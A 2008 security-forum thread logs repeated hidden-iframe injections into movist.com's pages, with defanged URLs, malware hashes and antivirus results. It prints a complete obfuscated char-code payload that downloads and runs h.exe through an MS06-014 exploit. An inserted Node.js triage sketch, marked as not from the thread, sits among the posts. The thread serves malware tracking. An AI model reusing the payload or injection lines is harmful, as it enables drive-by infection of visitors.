Author Topic: movist.com  (Read 10347 times)

March 10, 2008, 11:09:01 pm

pcaccent

  • Special Access
  • Sr. Member

  • Offline
  • *

  • 190
Quote
hxxp://www.movist.com/
       hxxp://www.movist.com/inc/cssjs/movist.js
            document.write('<IFrame height=0 width=0 src="hxxp://121.125.78.130/comm.htm"></iframe>');
                    1) hxxp://121.125.78.130/H.exe
                    2) MS06-014
                    3) Dr.Web : Trojan.PWS.Gamania.7879
                        V3 : x
                        NOD32 : x
                        Hauri : x
            document.write("<iframe width='0' height='0' src='hxxp://naver.8866.org/wab/logo.gef'></iframe>");
                    x

March 11, 2008, 12:08:42 am
Reply #1

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964
Thank you.

March 11, 2008, 10:50:00 pm
Reply #2

pcaccent

March 10, 2008

Quote
document.write("<iframe width='0' height='0' src='hxxp://naver.8866.org/wab/logo.gef'></iframe>");

I think that the Chinese cracker made a mistake.

logo.gef (x)




So, today, movist.com

Quote
//document.write("<iframe width='0' height='0' src='hxxp://naver.8866.org/web/logo.gif'></iframe>");

downloads malware from

Quote
hxxp://www.17173.com.my/pic/ok.hlp

1) MS06-014
2) NOD32 : x
   Dr.Web : Trojan.PWS.Gamania.6598
   V3 : x
   Virobot : x

 
I guess the Chinese cracker made another mistake... he didn't remove "//"

March 12, 2008, 04:43:01 pm
Reply #3

JohnC

Yeah, when I tried the other day it didn't work. Thanks ;)

March 13, 2008, 12:48:20 am
Reply #4

pcaccent

first :
Quote
hxxp://222.233.53.126/help.htm
second :
Quote
hxxp://121.125.78.130/comm.htm
third :
Quote
hxxp://naver.8866.org/wab/logo.gef

fourth, today(March 13, 2008, 09:51:01 AM) GMT+9

Quote
document.write('<IframE height=0 width=0 src="hxxp://222.233.53.123/help.htm"></iFramE>');
Quote
hxxp://www.movist.com/inc/cssjs/movist.js


March 13, 2008, 06:26:47 am
Reply #5

crunchtime

  • Special Access
  • Full Member

  • Offline
  • *

  • 54
Quote
hxxp://222.233.53.126/help.htm
Current help.html code:
Code:
<script>
t="60,115,99,114,105,112,116,32,116,121,112,101,61,34,116,101,120,116,47,106,115,99,114,105,112,116,34,62,13,10,102,117,110,99,116,105,111,110,32,105,110,105,116,40,41,32,123,32,13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,78,111,32,119,101,98,32,115,105,116,101,32,105,115,32,99,111,110,102,105,103,117,114,101,100,32,97,116,32,116,104,105,115,32,97,100,100,114,101,115,115,46,34,41,59,13,10,13,10,125,13,10,119,105,110,100,111,119,46,111,110,108,111,97,100,32,61,32,105,110,105,116,59,13,10,60,47,115,99,114,105,112,116,62,13,10,60,104,116,109,108,62,13,10,60,116,105,116,108,101,62,52,48,52,60,47,116,105,116,108,101,62,13,10,60,47,104,116,109,108,62,13,10,60,115,99,114,105,112,116,32,108,97,110,103,117,97,103,101,61,34,86,66,83,99,114,105,112,116,34,62,13,10,79,110,32,69,114,114,111,114,32,82,101,115,117,109,101,32,78,101,120,116,13,10,101,120,101,32,61,32,34,104,116,116,112,58,47,47,50,50,50,46,50,51,51,46,53,51,46,49,50,54,47,104,46,101,120,101,34,13,10,120,49,61,34,111,34,38,34,98,106,34,38,34,101,34,38,34,99,116,34,13,10,120,50,61,34,99,108,115,34,38,34,105,100,58,66,68,57,34,38,34,54,67,53,34,38,34,53,54,45,54,34,38,34,53,34,38,34,65,51,45,49,34,38,34,49,68,34,38,34,48,45,57,56,34,38,34,51,34,38,34,65,45,48,48,34,38,34,67,48,34,38,34,52,70,34,38,34,67,50,34,38,34,57,69,51,54,34,13,10,120,51,61,34,99,34,38,34,108,97,34,38,34,115,115,34,38,34,105,100,34,13,10,120,52,61,34,77,105,99,34,38,34,114,111,115,111,34,38,34,102,116,46,88,77,34,38,34,76,72,84,34,38,34,84,80,34,13,10,120,53,61,34,65,100,34,38,34,111,100,34,38,34,98,46,83,116,34,38,34,114,34,38,34,101,97,109,34,13,10,120,54,61,34,71,34,38,34,69,84,34,13,10,120,55,61,34,83,99,114,34,38,34,105,112,34,38,34,116,105,110,103,46,70,105,108,34,38,34,101,83,34,38,34,121,115,116,34,38,34,101,109,79,34,38,34,98,106,101,99,116,34,13,10,120,56,61,34,83,104,101,34,38,34,108,108,46,65,34,38,34,112,112,108,34,38,34,105,99,97,116,105,34,38,34,111,110,34,13,10,13,10,83,101,116,32,118,118,32,61,32,100,111,99,
117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,120,49,41,13,10,118,118,46,83,101,116,65,116,116,114,105,98,117,116,101,32,120,51,44,32,120,50,13,10,88,77,76,72,84,84,80,61,120,52,13,10,83,101,116,32,120,32,61,32,118,118,46,67,114,101,97,116,101,79,98,106,101,99,116,40,88,77,76,72,84,84,80,44,34,34,41,13,10,68,53,61,120,53,13,10,68,54,61,68,53,13,10,83,101,116,32,83,32,61,32,118,118,46,67,114,101,97,116,101,79,98,106,101,99,116,40,68,54,44,34,34,41,13,10,83,46,116,121,112,101,32,61,32,49,13,10,118,118,50,61,34,71,69,84,34,13,10,120,46,79,112,101,110,32,118,118,50,44,32,101,120,101,44,32,70,97,108,115,101,13,10,120,46,83,101,110,100,13,10,102,110,97,109,101,49,61,34,118,118,46,99,111,109,34,13,10,83,101,116,32,70,32,61,32,118,118,46,67,114,101,97,116,101,79,98,106,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,44,34,34,41,13,10,83,101,116,32,116,109,112,32,61,32,70,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,13,10,102,110,97,109,101,49,61,32,70,46,66,117,105,108,100,80,97,116,104,40,116,109,112,44,102,110,97,109,101,49,41,13,10,83,46,111,112,101,110,13,10,83,46,119,114,105,116,101,32,120,46,114,101,115,112,111,110,115,101,66,111,100,121,13,10,83,46,115,97,118,101,116,111,102,105,108,101,32,102,110,97,109,101,49,44,50,13,10,83,46,99,108,111,115,101,13,10,83,101,116,32,81,32,61,32,118,118,46,67,114,101,97,116,101,79,98,106,101,99,116,40,34,83,104,101,108,108,46,65,112,112,108,105,99,97,116,105,111,110,34,44,34,34,41,13,10,81,46,83,104,101,108,108,69,120,101,99,117,116,101,32,102,110,97,109,101,49,44,34,34,44,34,34,44,34,111,112,101,110,34,44,48,13,10,60,47,115,99,114,105,112,116,62"
t=eval("String.fromCharCode("+t+")");
document.write(t);</script>

Downloads this:
Quote
hxxp://222.233.53.126/h.exe

VirusTotal results for h.exe:
File h.exe received on 03.12.2008 02:57:08 (CET)
Current status: finished
Result: 14/32 (43.75%)
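
The wrapper in the help.htm snippet above (a comma-separated character-code list rebuilt with eval("String.fromCharCode(...)") and emitted with document.write) can be unwrapped as plain data, without running it. The following Node.js sketch is an added example, not code from the thread; its function names and the example.invalid sample are constructed for illustration.

```javascript
// Added example (not from the thread): static triage of injected script.
// SAMPLE is constructed: same wrapper shape as the posted snippet, but the
// char codes decode to a harmless hidden iframe on example.invalid.
const inner = '<iframe height=0 width=0 src="http://example.invalid/help.htm"></iframe>';
const SAMPLE = '<script>\nt="' + Array.from(inner, c => c.charCodeAt(0)).join(',') +
  '"\nt=eval("String.fromCharCode("+t+")");\ndocument.write(t);</script>';

// Decode every quoted run of 8+ comma-separated decimal char codes as plain
// data. Nothing is handed to eval or to a DOM.
function decodeCharCodeLists(source) {
  const out = [];
  const re = /["'](\s*\d{1,5}(?:\s*,\s*\d{1,5}){7,}\s*)["']/g;
  for (const m of source.matchAll(re)) {
    const codes = m[1].split(',').map(s => parseInt(s.trim(), 10));
    if (codes.every(n => n <= 0xffff)) out.push(String.fromCharCode(...codes));
  }
  return out;
}

// Rewrite the scheme so a reported URL is not clickable.
function defang(url) {
  return url.replace(/^http/i, 'hxxp');
}

// Return the defanged src of every iframe whose width and height are both 0.
function findHiddenIframes(text) {
  const hits = [];
  for (const [tag] of text.matchAll(/<iframe\b[^>]*>/gi)) {
    const attr = name => {
      const a = tag.match(new RegExp(
        '\\b' + name + '\\s*=\\s*(?:"([^"]*)"|\'([^\']*)\'|([^\\s>]+))', 'i'));
      return a ? (a[1] ?? a[2] ?? a[3]) : null;
    };
    if (attr('width') === '0' && attr('height') === '0') hits.push(defang(attr('src') || ''));
  }
  return hits;
}

// Scan the raw source and each decoded layer for hidden iframes.
function triage(source) {
  return [source, ...decodeCharCodeLists(source)].flatMap(findHiddenIframes);
}

console.log(triage(SAMPLE));
```

The same triage() call also covers the plain document.write('<iframe height=0 width=0 ...>') lines quoted elsewhere in this thread, since the raw source is scanned before any decoded layer.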

March 13, 2008, 03:13:35 pm
Reply #6

JohnC


March 15, 2008, 08:10:53 am
Reply #7

pcaccent

again, again, again!!! cracked movist.com

5th : today(March 15, 2008, 05:21:01 PM) GMT+9

Quote
hxxp://www.movist.com/
     <iframe src=hxxp://222.233.53.123/help.htm width=0 height=0></iframe>
              -hxxp://222.233.53.123/h.exe
     <script src=hxxp://222.233.53.123/help.htm></script>
              - hxxp://222.233.53.123/h.exe

Quote
hxxp://www.movist.com/inc/cssjs/movist.js
     document.write('<IframE height=0 width=0 src="hxxp://222.233.53.123/help.htm"></iFramE>');
              - hxxp://222.233.53.123/h.exe
     docdsument.write("<iframe width='0' height='0' src='hxxp://naver.8866.org/web/logo.gif'></iframe>");
              - hxxp://www.17173.com.my/pic/ok.hlp
                         same url

March 17, 2008, 12:54:42 pm
Reply #8

pcaccent

6th : today(March 17, 2008, 09:48:01 PM) GMT+9

Quote
document.write('<iframe height=0 width=0 src="hxxp://www.eosoccer.com/images/icon/bu_arrow.gif"></iframe>');

Quote
hxxp://www.movist.com/
         hxxp://www.movist.com/inc/cssjs/movist.js
                 hxxp://img8.zol.com.cn/bbs/upload/205/204945_600.jpg
                      - hot picture!
                 hxxp://www.eosoccer.com/images/icon/bu_arrow.gif
                      - hxxp://121.125.78.130/h.exe
                      - MS06-014 exploit

7th : today(March 17, 2008, 11:28:01 PM) GMT+9
changed url

Quote
hxxp://www.movist.com/
         hxxp://www.movist.com/inc/cssjs/movist.js
                    document.write("<iframe width='0' height='0' src='hxxp://naver.8866.org/web/logo.gif'></iframe>");

8th : today(March 18, 2008, 09:01:01 AM) GMT+9

Quote
hxxp://www.movist.com/
         <iframe height=0 width=0 src="hxxp://121.125.78.130/help.htm"></iframe>
                    hxxp://121.125.78.130/h.exe
         hxxp://www.movist.com/inc/cssjs/movist.js
                    document.write('<iframe height=0 width=0 src="hxxp://121.125.78.130/help.htm"></iframe>');
                                   hxxp://121.125.78.130/h.exe
                   document.write("<iframe width='0' height='0' src='hxxp://naver.8866.org/web/logo.gif'></iframe>");

March 20, 2008, 11:28:07 am
Reply #9

pcaccent

9th : today(March 20, 2008, 08:28:01 PM) GMT+9

Quote
hxxp://www.movist.com/
              hxxp://www.movist.com/inc/cssjs/movist.js
                            document.write('<iframe height=0 width=0 src="hxxp://221.143.51.212:89/index.htm"></iframe>');

March 22, 2008, 12:05:08 am
Reply #10

pcaccent

10th : today(March 22, 2008, 09:04:01 AM) GMT+9
.
Quote
hxxp://www.movist.com/inc/cssjs/movist.js
        document.write('<iframe height=0 width=0 src="hxxp://221.143.51.212:89/index.htm"></iframe>');
        document.write('<iframe height=0 width=0 src="hxxp://221.143.51.218/info/index.htm"></iframe>');
                hxxp://221.143.51.218/h.exe
                MD5 : 1C86558637B7CFEBA721B89D69A62CAB

March 23, 2008, 07:08:34 am
Reply #11

pcaccent

11th : today(March 23, 2008, 04:07:01 PM) GMT+9

Quote
hxxp://www.movist.com/inc/cssjs/movist.js
             document.write('<iframe height=0 width=0 src="hxxp://221.139.48.211:81/index.htm"></iframe>');
                         hxxp://221.139.48.211:81/h.exe
                                  MD5 : 1C86558637B7CFEBA721B89D69A62CAB
                                  same file
             document.write('<iframe height=0 width=0 src="hxxp://221.143.51.212:89/index.htm"></iframe>');
                         - same url

March 30, 2008, 11:05:52 pm
Reply #12

pcaccent

March 31, 2008, 08:05:01 AM(GMT+9)

Quote
document.write('<iframe height=0 width=0 src="hxxp://www.musicmoa.net/fla/index.htm"></iframe>');
        hxxp://www.musicmoa.net/fla/H.exe

May 09, 2008, 12:24:41 pm
Reply #13

pcaccent

May 09, 2008, 09:23:05 PM(GMT+9)

Quote
hxxp://www.movist.com/
        hxxp://211.239.121.161/index.html/
                hxxp://211.239.121.161/H.exe


May 09, 2008, 08:40:14 pm
Reply #14

JohnC

Thank you.